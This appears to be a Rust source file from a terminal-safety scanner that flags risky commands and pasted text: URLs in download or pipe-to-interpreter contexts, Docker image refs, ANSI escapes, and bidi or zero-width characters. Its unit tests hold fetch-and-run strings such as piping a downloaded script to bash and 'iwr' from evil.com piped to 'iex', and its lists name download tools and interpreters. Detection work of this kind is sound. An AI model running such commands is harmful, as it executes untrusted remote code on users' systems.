Skip to main content

tirith_core/
extract.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
7/// Context for Tier 1 scanning.
8#[derive(Debug, Clone, Copy, PartialEq, Eq)]
9pub enum ScanContext {
10    /// Exec-time: command about to be executed (check subcommand).
11    Exec,
12    /// Paste-time: content being pasted (paste subcommand).
13    Paste,
14}
15
16// Include generated Tier 1 patterns from build.rs declarative pattern table.
17#[allow(dead_code)]
18mod tier1_generated {
19    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
20}
21
22/// Tier 1 exec-time regex — generated from declarative pattern table in build.rs.
23static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
24    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
25});
26
27/// Tier 1 paste-time regex — exec patterns PLUS paste-only patterns (e.g. non-ASCII).
28static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
29    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
30});
31
32/// Standard URL extraction regex for Tier 3.
33static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
34    Regex::new(
35        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
36    )
37    .expect("url regex must compile")
38});
39
40/// Control character patterns for paste-time byte scanning.
41pub struct ByteScanResult {
42    pub has_ansi_escapes: bool,
43    pub has_control_chars: bool,
44    pub has_bidi_controls: bool,
45    pub has_zero_width: bool,
46    pub has_invalid_utf8: bool,
47    pub details: Vec<ByteFinding>,
48}
49
50pub struct ByteFinding {
51    pub offset: usize,
52    pub byte: u8,
53    pub description: String,
54}
55
56/// Tier 1: Fast scan for URL-like content. Returns true if full analysis needed.
57pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
58    match context {
59        ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
60        ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
61    }
62}
63
64/// Scan raw bytes for control characters (paste-time, Tier 1 step 1).
65pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
66    let mut result = ByteScanResult {
67        has_ansi_escapes: false,
68        has_control_chars: false,
69        has_bidi_controls: false,
70        has_zero_width: false,
71        has_invalid_utf8: false,
72        details: Vec::new(),
73    };
74
75    // Check for invalid UTF-8
76    if std::str::from_utf8(input).is_err() {
77        result.has_invalid_utf8 = true;
78    }
79
80    let len = input.len();
81    let mut i = 0;
82    while i < len {
83        let b = input[i];
84
85        // ANSI escape sequences
86        if b == 0x1b && i + 1 < len && input[i + 1] == b'[' {
87            result.has_ansi_escapes = true;
88            result.details.push(ByteFinding {
89                offset: i,
90                byte: b,
91                description: "ANSI escape sequence".to_string(),
92            });
93            i += 2;
94            continue;
95        }
96
97        // Control characters (< 0x20, excluding common whitespace)
98        if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b && (b == b'\r' || b == 0x08) {
99            result.has_control_chars = true;
100            result.details.push(ByteFinding {
101                offset: i,
102                byte: b,
103                description: format!("control character 0x{b:02x}"),
104            });
105        }
106
107        // Check for UTF-8 multi-byte sequences that are bidi or zero-width
108        if b >= 0xc0 {
109            // Try to decode UTF-8 character
110            let remaining = &input[i..];
111            if let Some(ch) = std::str::from_utf8(remaining)
112                .ok()
113                .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
114                .and_then(|s| s.chars().next())
115            {
116                // Bidi controls
117                if is_bidi_control(ch) {
118                    result.has_bidi_controls = true;
119                    result.details.push(ByteFinding {
120                        offset: i,
121                        byte: b,
122                        description: format!("bidi control U+{:04X}", ch as u32),
123                    });
124                }
125                // Zero-width characters
126                if is_zero_width(ch) {
127                    result.has_zero_width = true;
128                    result.details.push(ByteFinding {
129                        offset: i,
130                        byte: b,
131                        description: format!("zero-width character U+{:04X}", ch as u32),
132                    });
133                }
134                i += ch.len_utf8();
135                continue;
136            }
137        }
138
139        i += 1;
140    }
141
142    result
143}
144
145/// Check if a character is a bidi control.
146fn is_bidi_control(ch: char) -> bool {
147    matches!(
148        ch,
149        '\u{200E}' // LRM
150        | '\u{200F}' // RLM
151        | '\u{202A}' // LRE
152        | '\u{202B}' // RLE
153        | '\u{202C}' // PDF
154        | '\u{202D}' // LRO
155        | '\u{202E}' // RLO
156        | '\u{2066}' // LRI
157        | '\u{2067}' // RLI
158        | '\u{2068}' // FSI
159        | '\u{2069}' // PDI
160    )
161}
162
163/// Check if a character is zero-width.
164fn is_zero_width(ch: char) -> bool {
165    matches!(
166        ch,
167        '\u{200B}' // ZWSP
168        | '\u{200C}' // ZWNJ
169        | '\u{200D}' // ZWJ
170        | '\u{FEFF}' // BOM / ZWNBSP
171    )
172}
173
174/// Tier 3: Extract URL-like patterns from a command string.
175/// Uses shell-aware tokenization, then extracts URLs from each segment.
176pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
177    let segments = tokenize::tokenize(input, shell);
178    let mut results = Vec::new();
179
180    for segment in &segments {
181        // Extract standard URLs from raw text
182        for mat in URL_REGEX.find_iter(&segment.raw) {
183            let raw = mat.as_str().to_string();
184            let url = parse::parse_url(&raw);
185            results.push(ExtractedUrl {
186                raw,
187                parsed: url,
188                segment_index: results.len(),
189                in_sink_context: is_sink_context(segment, &segments),
190            });
191        }
192
193        // Check for schemeless URLs in sink contexts
194        // Skip for docker/podman/nerdctl commands since their args are handled as DockerRef
195        let is_docker_cmd = segment.command.as_ref().is_some_and(|cmd| {
196            let cmd_lower = cmd.to_lowercase();
197            matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl")
198        });
199        if is_sink_context(segment, &segments) && !is_docker_cmd {
200            for arg in &segment.args {
201                let clean = strip_quotes(arg);
202                if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
203                    results.push(ExtractedUrl {
204                        raw: clean.clone(),
205                        parsed: UrlLike::SchemelessHostPath {
206                            host: extract_host_from_schemeless(&clean),
207                            path: extract_path_from_schemeless(&clean),
208                        },
209                        segment_index: results.len(),
210                        in_sink_context: true,
211                    });
212                }
213            }
214        }
215
216        // Check for Docker refs in docker commands
217        if let Some(cmd) = &segment.command {
218            let cmd_lower = cmd.to_lowercase();
219            if matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl") {
220                if let Some(docker_subcmd) = segment.args.first() {
221                    let subcmd_lower = docker_subcmd.to_lowercase();
222                    if matches!(
223                        subcmd_lower.as_str(),
224                        "pull" | "run" | "build" | "create" | "image"
225                    ) {
226                        // The image ref is typically the last non-flag argument
227                        for arg in segment.args.iter().skip(1) {
228                            let clean = strip_quotes(arg);
229                            if !clean.starts_with('-') && !clean.contains("://") {
230                                let docker_url = parse::parse_docker_ref(&clean);
231                                results.push(ExtractedUrl {
232                                    raw: clean,
233                                    parsed: docker_url,
234                                    segment_index: results.len(),
235                                    in_sink_context: true,
236                                });
237                            }
238                        }
239                    }
240                }
241            }
242        }
243    }
244
245    results
246}
247
248/// An extracted URL with context.
249#[derive(Debug, Clone)]
250pub struct ExtractedUrl {
251    pub raw: String,
252    pub parsed: UrlLike,
253    pub segment_index: usize,
254    pub in_sink_context: bool,
255}
256
257/// Check if a segment is in a "sink" context (executing/downloading).
258fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
259    if let Some(cmd) = &segment.command {
260        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
261        let cmd_lower = cmd_base.to_lowercase();
262        if is_source_command(&cmd_lower) {
263            return true;
264        }
265    }
266
267    // Check if this segment pipes into a sink
268    if let Some(sep) = &segment.preceding_separator {
269        if sep == "|" || sep == "|&" {
270            // This segment receives piped input — check if it's an interpreter
271            if let Some(cmd) = &segment.command {
272                let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
273                if is_interpreter(cmd_base) {
274                    return true;
275                }
276            }
277        }
278    }
279
280    false
281}
282
283fn is_source_command(cmd: &str) -> bool {
284    matches!(
285        cmd,
286        "curl"
287            | "wget"
288            | "fetch"
289            | "scp"
290            | "rsync"
291            | "git"
292            | "ssh"
293            | "docker"
294            | "podman"
295            | "nerdctl"
296            | "pip"
297            | "pip3"
298            | "npm"
299            | "npx"
300            | "yarn"
301            | "pnpm"
302            | "go"
303            | "cargo"
304            | "iwr"
305            | "irm"
306            | "invoke-webrequest"
307            | "invoke-restmethod"
308    )
309}
310
311fn is_interpreter(cmd: &str) -> bool {
312    matches!(
313        cmd,
314        "sh" | "bash"
315            | "zsh"
316            | "dash"
317            | "ksh"
318            | "python"
319            | "python3"
320            | "node"
321            | "perl"
322            | "ruby"
323            | "php"
324            | "iex"
325            | "invoke-expression"
326    )
327}
328
329fn strip_quotes(s: &str) -> String {
330    let s = s.trim();
331    if (s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')) {
332        s[1..s.len() - 1].to_string()
333    } else {
334        s.to_string()
335    }
336}
337
338fn looks_like_schemeless_host(s: &str) -> bool {
339    // Must contain a dot, not start with -, not be a flag
340    if s.starts_with('-') || !s.contains('.') {
341        return false;
342    }
343    // First component before / or end should look like a domain
344    let host_part = s.split('/').next().unwrap_or(s);
345    if !host_part.contains('.') || host_part.contains(' ') {
346        return false;
347    }
348    // Exclude args where the host part looks like a file (e.g., "install.sh")
349    // Only check the host part (before first /), not the full string with path
350    let file_exts = [
351        ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h", ".txt", ".md", ".json",
352        ".yaml", ".yml", ".xml", ".html", ".css", ".tar.gz", ".tar.bz2", ".tar.xz", ".tgz", ".zip",
353        ".gz", ".bz2", ".rpm", ".deb", ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so", ".log",
354        ".conf", ".cfg", ".ini", ".toml",
355    ];
356    let host_lower = host_part.to_lowercase();
357    if file_exts.iter().any(|ext| host_lower.ends_with(ext)) {
358        return false;
359    }
360    // Must have at least 2 labels (e.g., "example.com" not just "file.txt")
361    let labels: Vec<&str> = host_part.split('.').collect();
362    if labels.len() < 2 {
363        return false;
364    }
365    // Last label (TLD) should be 2-6 alphabetic chars
366    let tld = labels.last().unwrap();
367    tld.len() >= 2 && tld.len() <= 6 && tld.chars().all(|c| c.is_ascii_alphabetic())
368}
369
370fn extract_host_from_schemeless(s: &str) -> String {
371    s.split('/').next().unwrap_or(s).to_string()
372}
373
374fn extract_path_from_schemeless(s: &str) -> String {
375    if let Some(idx) = s.find('/') {
376        s[idx..].to_string()
377    } else {
378        String::new()
379    }
380}
381
382#[cfg(test)]
383mod tests {
384    use super::*;
385
386    #[test]
387    fn test_tier1_exec_matches_url() {
388        assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
389    }
390
391    #[test]
392    fn test_tier1_exec_no_match_simple() {
393        assert!(!tier1_scan("ls -la", ScanContext::Exec));
394    }
395
396    #[test]
397    fn test_tier1_exec_no_match_echo() {
398        assert!(!tier1_scan("echo hello world", ScanContext::Exec));
399    }
400
401    #[test]
402    fn test_tier1_exec_matches_pipe_bash() {
403        assert!(tier1_scan("something | bash", ScanContext::Exec));
404    }
405
406    #[test]
407    fn test_tier1_exec_matches_pipe_sudo_bash() {
408        assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
409    }
410
411    #[test]
412    fn test_tier1_exec_matches_pipe_env_bash() {
413        assert!(tier1_scan("something | env bash", ScanContext::Exec));
414    }
415
416    #[test]
417    fn test_tier1_exec_matches_pipe_bin_bash() {
418        assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
419    }
420
421    #[test]
422    fn test_tier1_exec_matches_git_scp() {
423        assert!(tier1_scan(
424            "git clone git@github.com:user/repo",
425            ScanContext::Exec
426        ));
427    }
428
429    #[test]
430    fn test_tier1_exec_matches_punycode() {
431        assert!(tier1_scan(
432            "curl https://xn--example-cua.com",
433            ScanContext::Exec
434        ));
435    }
436
437    #[test]
438    fn test_tier1_exec_matches_docker() {
439        assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
440    }
441
442    #[test]
443    fn test_tier1_exec_matches_iwr() {
444        assert!(tier1_scan(
445            "iwr https://evil.com/script.ps1",
446            ScanContext::Exec
447        ));
448    }
449
450    #[test]
451    fn test_tier1_exec_matches_curl() {
452        assert!(tier1_scan(
453            "curl https://example.com/install.sh",
454            ScanContext::Exec
455        ));
456    }
457
458    #[test]
459    fn test_tier1_exec_matches_lookalike_tld() {
460        assert!(tier1_scan("open file.zip", ScanContext::Exec));
461    }
462
463    #[test]
464    fn test_tier1_exec_matches_shortener() {
465        assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
466    }
467
468    #[test]
469    fn test_tier1_paste_matches_non_ascii() {
470        assert!(tier1_scan("café", ScanContext::Paste));
471    }
472
473    #[test]
474    fn test_tier1_paste_exec_patterns_also_match() {
475        assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
476    }
477
478    #[test]
479    fn test_tier1_exec_no_non_ascii() {
480        // Non-ASCII should NOT trigger exec-time scan
481        assert!(!tier1_scan("echo café", ScanContext::Exec));
482    }
483
484    #[test]
485    fn test_byte_scan_ansi() {
486        let input = b"hello \x1b[31mred\x1b[0m world";
487        let result = scan_bytes(input);
488        assert!(result.has_ansi_escapes);
489    }
490
491    #[test]
492    fn test_byte_scan_control_chars() {
493        let input = b"hello\rworld";
494        let result = scan_bytes(input);
495        assert!(result.has_control_chars);
496    }
497
498    #[test]
499    fn test_byte_scan_bidi() {
500        let input = "hello\u{202E}dlrow".as_bytes();
501        let result = scan_bytes(input);
502        assert!(result.has_bidi_controls);
503    }
504
505    #[test]
506    fn test_byte_scan_zero_width() {
507        let input = "hel\u{200B}lo".as_bytes();
508        let result = scan_bytes(input);
509        assert!(result.has_zero_width);
510    }
511
512    #[test]
513    fn test_byte_scan_clean() {
514        let input = b"hello world\n";
515        let result = scan_bytes(input);
516        assert!(!result.has_ansi_escapes);
517        assert!(!result.has_control_chars);
518        assert!(!result.has_bidi_controls);
519        assert!(!result.has_zero_width);
520    }
521
522    #[test]
523    fn test_extract_urls_basic() {
524        let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
525        assert_eq!(urls.len(), 1);
526        assert_eq!(urls[0].raw, "https://example.com/install.sh");
527    }
528
529    #[test]
530    fn test_extract_urls_pipe() {
531        let urls = extract_urls(
532            "curl https://example.com/install.sh | bash",
533            ShellType::Posix,
534        );
535        assert!(!urls.is_empty());
536        assert!(urls[0].in_sink_context);
537    }
538
539    #[test]
540    fn test_extract_urls_scp() {
541        let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
542        assert!(!urls.is_empty());
543        assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
544    }
545
546    #[test]
547    fn test_extract_docker_ref() {
548        let urls = extract_urls("docker pull nginx", ShellType::Posix);
549        let docker_urls: Vec<_> = urls
550            .iter()
551            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
552            .collect();
553        assert_eq!(docker_urls.len(), 1);
554    }
555
556    #[test]
557    fn test_extract_powershell_iwr() {
558        let urls = extract_urls(
559            "iwr https://example.com/script.ps1 | iex",
560            ShellType::PowerShell,
561        );
562        assert!(!urls.is_empty());
563    }
564
565    /// Constraint #2: Verify that EXTRACTOR_IDS is non-empty and
566    /// that all generated fragment counts are positive.
567    /// This is a module boundary enforcement test — ensures no secret
568    /// extractors exist outside the declarative pattern table.
569    #[test]
570    fn test_tier1_module_boundary_enforcement() {
571        // Verify extractor IDs are generated
572        let ids = tier1_generated::EXTRACTOR_IDS;
573        assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
574        // Verify exec and paste fragment counts
575        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
576        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
577        assert!(exec_count > 0, "Must have exec fragments");
578        assert!(
579            paste_count >= exec_count,
580            "Paste fragments must be superset of exec fragments"
581        );
582        // Verify the generated patterns are valid regexes
583        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
584            .expect("Generated exec pattern must be valid regex");
585        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
586            .expect("Generated paste pattern must be valid regex");
587    }
588}